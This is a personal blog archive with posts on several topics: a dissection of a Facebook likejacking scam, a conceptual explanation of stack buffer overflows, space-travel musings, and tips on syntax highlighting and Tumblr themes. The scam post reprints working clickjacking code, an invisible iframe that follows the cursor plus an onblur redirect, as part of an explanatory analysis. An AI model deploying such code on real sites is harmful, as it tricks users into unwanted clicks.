Yes, we have this sort of stuff going on almost every day but today I fell for this one, and as I write this, 61976 more people have too. What the little bugger does is makes you “like” something that is basically a pile of ads so all your friends click on it and… well you get it, don’t you?

Anyway, I had nothing to do so I dissected the thing a bit and it’s actually quite interesting. The page by itself looks like this:

I did not click that one specifically. It looks like they redirect you to new ones as old ones get banned. As for now I’ve been routed through one about some supposedly funny webcam situation (yeah, I clicked that, shut up…) and another about Miley Cirrus which had a good reception among my contacts… sigh. Anyway the code looks like crap of course and it’s bloated with iframes. I looked a bit into it and I found the first interesting piece of code.

<div id="fbLikeFrame" 
    style="overflow: hidden; width: 100px; height: 100px; position: absolute; opacity: 0;">
    <iframe scrolling="no" frameborder="0" name="fbframe" id="fbframe"
    allowtransparency="true" style="border: medium none; overflow: hidden;
    width: 50px; height: 23px;" 
    src="http://www.facebook.com/plugins/like.php?href=http://respectmiley.com/
           &amp;layout=standard&amp;show_faces=false&amp;width=450
           &amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80">
    </iframe>
</div>

There you go, the attack point is some small iframe that contains the like button. It’s set to transparent and sized like the proper like button. When you’re not signed in it looks like this:

So, how do they force you to click that? Of course with javascript. As you are expected to click on the video, this little snippet does the job:

document.getElementById('Troll').focus();
var myHTMLBody=(document.compatMode=="CSS1Compat") ? document.documentElement : document.body; 
var fbLikeFrame = document.getElementById('fbLikeFrame');
var myBoolean = 0;

function mouseFollower(e){
    if (window.event) { 
        fbLikeFrame.style.top = (window.event.y-10)+myHTMLBody.scrollTop+'px';
        fbLikeFrame.style.left = (window.event.x-10)+myHTMLBody.scrollLeft+'px';
    } else {
        fbLikeFrame.style.top = (e.pageY-10)+'px'; fbLikeFrame.style.left = (e.pageX-10)+'px';
    }
}   
document.onmousemove = function(e) {
    if (myBoolean == 0) {mouseFollower(e);} else fbLikeFrame.style.display = 'none';
}

This is pretty much self-descriptive. On mousemove the fbLikeFrame follows the cursor (while being invisible) so it’s always over the like button. When you finally click to watch the video you actually click the like button inside the iframe, the Troll-ID element loses focus() (given at the first line) and you’re redirected to widget2.php inside the iframe. This can be seen in the definition of that element in the onblur property.

<input type="text" style="width: 0px; height: 0px;" id="Troll" onblur="window.location = 'widget2.php'">

And that’s it. This new widget2.php page is mostly the same but includes a pretty standard (and very obfuscated) code that prompts you to do some surveys or whatever so you can get to the content itself. When you do that you are allowed to finally click the video and you’re redirected to Youtube where they show you a totally unrelated video about a three year old crying because of Justin Bieber (wat?).

So there you go, don’t click on fishy stuff and if you feel like doing it anyway, use NoScript. Have fun.

Here am I again with lots of interesting stuff. Or maybe not. By the way, this is my first post from the iPod touch. it’s a rainy day and I’m taking the bus back home right now.

Lately I’ve been thinking about a lot of stuff. Some ideas that have been around my mind and I think they deserve some attention. Most of them come from the fact I recently played a great game, Mass Effect, an astounding futuristic role-playing video game by BioWare. A lot of futuristic technology is of course shown there, but the things that got my attention are precisely the most mundane.

One of them is the extended concept of modularity. For example the use of premade standarized plastic housing is the base for all the ground camps depicted in the game. Why can’t we apply this concept for extending housing to the most underdeveloped zones here on earth? The use of cheap plastic heat-isolated blocks equipped with basic water filters may help greatly to the most poor. Of course a cost approximation must be made first of all. But if we can trim it down to the $100 range it could be the next step in the path the OLPC started.

Other intersting concept, unrelated this time to the game, is the possibility of reproducing photosynthesis technically. If more money is invested in this technology me can achieve a point in which a solar powered glucose generatoris available. This will literally vanish most of the hunger problems in the world by giving endless supply of basic nutrients to everybody.

Not only this, but coupled to an efficient water supply could boost the survability of future space colonies on the moon or other planets.

Okay right now I’m taking the train and that makes me think about transportation. Space transportation more specifically. We all know that a chemically propelled rocket will made it to Mars in about six months. Six months exposed to the exteme cosmic particles radiation. This is, on my opinion, too long. By doing this trip you will raise your chances of deding by a cancer to over 40%. Shielding is still very experimental and will be for sure very heavy and costly if available in the future. Which is then the solution? Of course it’s speed. If we can manage to travel there in two weeks instead of six months the radiation levels will be tolerable. And what kind of exotic irreal technology can achieve this? Well, just some 60’s nuclear weaponry knowledge. By using controlled nuclear We could manage to get 0,1c without problem and cut radically te travel time to other planets. Yes, Mars I two weeks ad Luna in couple of hours maybe.

And why aren’t we building this marvel right now? Well, in fact was planned to be built thirty years ago, but the international prohibition of nuclear testing in space made it inviable. Nuclear explosions in the space can severally disrupt artificial satellites at a long distance because of the electromagnetic waves produced. But wha if we used this methods only far away from the LEO? I can’t think of a better use for those old nuclear warheads stored everywhere. We must push this ideas forward because this technology will become eventually a must for reaching the considerable speeds needed for a full scale colonization of the solar system.

Well, next stop and I’m leaving the train. I will upload this post when I get home. Have fun and excuse me for the typos.

Crap, I just wrote some funny post about not writing a thing but doing lots of themes for the blog and the damned Tumblr crashed. Anyway, I made a new theme because I was really bored and I expect to give back some life to this blog by writing some posts about my last project and sharing some thoughts I had roaming in my mind recently.

If you care, stay tuned. By the way, I just bought Portal and replayed it. I love that game.

I just found an awesome video from January 2009 in which the astronaut Mike Fincke takes a tour inside the [International Space Station](http://en.wikipedia.org/wiki/ISS]. If you haven’t seen it before and you are interested in space exploration I strongly encourage you to watch it.

Here the four-part version on Youtube:

I hope you like it.

I just added some syntax highlighting to the code shown in this blog and I thought it would be great to share with everybody how I did that.

Of course the first thing I did was a quick look in Google. I found lots of different scripts for this matter but almost all of them required you to explicitly define the language each code you want to highlight is written in. I don’t want to lose my time doing that. Fortunately I found google-code-prettify which has great auto-detection capabilities.

Installing the script

First we just upload all the scripts that come in the zip to some server. We link both the main Javascript and the CSS files from our HTML

<script type="text/javascript" src="SERVER/prettify.js"></script>
<link href="SERVER/prettify.css" type="text/css" rel="stylesheet" />

After doing that we initialize the script either by adding an onload parameter to our body tag

<body onload="prettyPrint()">

or if we are using JQuery for example, adding this to our Javascript

$(document).ready(function() {
    prettyPrint();
});

Finally we add the prettyprint class to every pre or code tag we want to highlight. We can add that dynamically to all the code tags with

$('code').addClass('prettyprint');

If we don’t like the final result we can personalize how our code block will look either by styling the code or the .prettyprint values in our CSS.

With this simple process all the code we include in our blog will be automatically recognized and highlighted accordingly.

And now I’m going to bed because I’ll wake up tomorrow at 6.45, and that’s just in five hours. Good night.

Normal users have a pretty good amount of choices when they want to start a new blog. There are lots of free blogging sites like Wordpress.com, Blogger or Tumblr where you can start writing without the trouble of installing (and paying) your own hosting and blogging software.

But usually the more advanced users look for something more customizable and then the canonic option if you don’t want to develop your own CMS is Wordpress. Even with the free online version in Wordpress.com you can develop fully custom themes with all kinds of goodies including custom external CSS, separate Javascript files, et cetera.

But some of us just love the simplicity and awesomeness of Tumbrl. And most of us just don’t want to use one of this generic themes that everyone uses. But the problem is that the only customization that Tumbrl allows is uploading your HTML code to a poor textarea. And that’s not enough for me.

The good stuff: templating

Even with this limitation, Tumbrl is very customizable. When writing your HTML code you can use lots of special tags, like {Title} or {RSS}. These will be replaced by the corresponding values in the final view. As is expected from this kind of templating engines, you can define loops that will be executed for each post in your blog, et cetera. You can find all this information in the corresponding page of the Tumblr doc site.

The limitation of this method is that you can only embed your CSS into the same code. You can’t upload your own css or js files and (I think) you can’t even upload your theme’s images.

The solution

Sure you are going to say this is obvious, dude, but it was great for me when I figured out. The thing is that I got a ridiculous 5 MB web site space with this domain. I thought that was useless, but it turned to be essential to my project. I uploaded all the Javascript, CSS and images to that tiny site and just linked my HTML to that file. And problem solved, now I have a full-featured modular CSS style for my blog without losing the great aspects of having a Tumbrl-based blog.

You can do the same with one of this free hosting services. Even if they put ads in your site, CSS and other files are not affected by that. Just link them from your custom HTML in Tumblr and watch your site grow modularly.

You know, this blog is called 0x41. Maybe it’s not one of this fancy web 2.0 names and definitely it’s not an easy to remember title. But actually it means something.

As the most tech-savvy of you know, 0x41 (i.e. the hexadecimal value 41) corresponds to the A character in the ASCII table. And this is not relevant because it corresponds to the first letter of my name but because this character is the most common placeholder for the injection strings used in a huge range of overflow exploits.

What? Strings? Overflows? Exploits? What’s going on here? Let me explain.

Fun example: the Stack

Computers are complicated creatures. If you know some programming (if you don’t probably you will understand nothing) you may have asked yourself how the computer knows which are the arguments given to a function or how it remembers where to go back after executing some subroutine. The answer to this may depend on architectures or operative systems, but a fairly common approach is the use of the stack.

The stack is just some chunk of memory assigned to a process. It usually sits somewhere near the code and all the miscellaneous data and its purpose is to hold most of the variables that our system needs in runtime. As the name suggests, the stack is distributed in a LIFO (Last In First Out) layout where Push and Pop instructions add and retrieve values from the pile. What we will call the top of the stack is actually the bottom in the memory. Just understand this as if we pushed stuff towards the ceiling into some sort of pipe and then pulled this stuff by dragging towards the floor. Or something like this.

A couple of registers, the stack pointer and the frame pointer, will do the necessary management to this structure. The first one will always point to the end of the stack while the second will point to some static value within the stack.

When you call some function in your code some important values will be pushed to the stack in a certain order. For example:

int sum(int a, int b) {
    return a + b;
}
int main() {
    sum(2, 3);
    return 0;
}

Here the sum(2, 3) instuction will be translated by the compiler to something like:

pushl $3
pushl $2
call sum

This is, the two given values (literals 2 and 3) are pushed to the stack and then the function is called. Before actually executing the function, the call instruction will push the instruction pointer to the stack. This value points to where the currently executing code is right know. As you would expect, this will be used for resuming the main execution when the sum function ends.

The first thing to happen in the sum function will be the frame pointer value being pushed to the stack. Then the current stack pointer value (which is pointing just to the top of the last pushed value, the frame pointer) will be stored into the frame pointer register. Then all the necessary memory for the local variables will be allocated on top of the stack. This is done just by moving the stack pointer down the necessary. Here is a quick diagram of this mess:

Low Memory         Frame Pointer points here
                                 /
[   Local Variables   ][ Old FP ][ Return Add.][2][3]
\
Stack Pointer points here                       High Memory

After all this magic happens our function will just use the frame pointer as a reference for retrieving both numbers, adding them, returning the value or whatever and finally going back to the instruction pointed in the Return Address block that was pushed at the beginning.

Exploiting this shit

Okay, all that technical stuff is great but how is this useful to me and how is the ‘A’ char related to this? You will find that in a moment. Imagine we have some function with a local variable, let’s say

 char buffer[10];

As you may know, this represents a 10-value character array, this is, a set of 10 ascii letters standing one next to the other. In this situation our stack will be something like:

 [ Other local variables ][ 10 char array ][ Old FP ][ Return Add. ][ Function parameters ]

Let’s say there is some kind of process in our function we use for filling this array. And let’s imagine there is no check for the boundaries in that process. We could in theory write more than 10 characters and, as you would expect this will overwrite other values in the stack. Maybe you already know what’s going on here.

We start our debugger, execute the program. We get some input prompt, let’s say an username or password field. And we decide to write a really big amount of ‘A’ letters. Bang!, the program crashes. And we got the debuggers verdict: error when accessing the unknown memory location 0x41414141. Then we smile.

What this means is simple. When the function has finished its business, it tries to continue executing where it left. But we changed this place to a bunch of A’s and obviously this is not pointing to the correct place. Imagine now that we figure the distance from the array to the return address. We can inject in this specific spot anything we want like, for example, the address of some nasty code that opens a backdoor in the computer, giving anybody access to the system from the Internet.

This code is called a shellcode and there’s a whole world of techniques for putting it in the correct spot. This injection of overflowing string technique is basically the angular stone of most of the software breaking processes, from the most obscure hacking of some government facility to the jailbreak of your iPhone.

That’s it

Well, now you know why this blog is called 0x41. This doesn’t mean that this is one of this security-focused sites. I just found it funny. If you want to learn more about stack overflowing you must read the 1996’s classic Smashing the Stack for fun and profit from the Phrack magazine. I learnt almost everything I know about this topic by reading that text.

Of course if you find something wrong (which is probable, I’m very far away from being some kind of security or computer expert) just tell me in the comments and I’ll fix it.

Have a nice day.

Well, hello. I don’t now how to start this. A couple of days ago I decided I wanted one of this fancy .eu domains. The problem is I had no idea what to do with it. And somehow I ended building this sort of blog without purpose or even a main topic.

I assume I’m never going to write anything here again, but anyway I need some kind of placeholder text here and that’s why I’m going to write about myself.

My name is Adrià López. I’m from Spain and, in fact, this is the first time I write a blog post in english. I don’t even know why I’m doing this. Nobody is going to care about my stuff so I could just write in one of my first languages. But there would be no challenge in doing that. Or something. Anyway, nowadays I’m studying Physics at the UV. Besides that my main interests include all this computer science things and electronics too. You know, a standard geek.

This means that if I write something here it will probably be about one of this topics. Or won’t, I don’t know. We’ll see.

Can’t find anything else to say right now. Stay tuned, or not.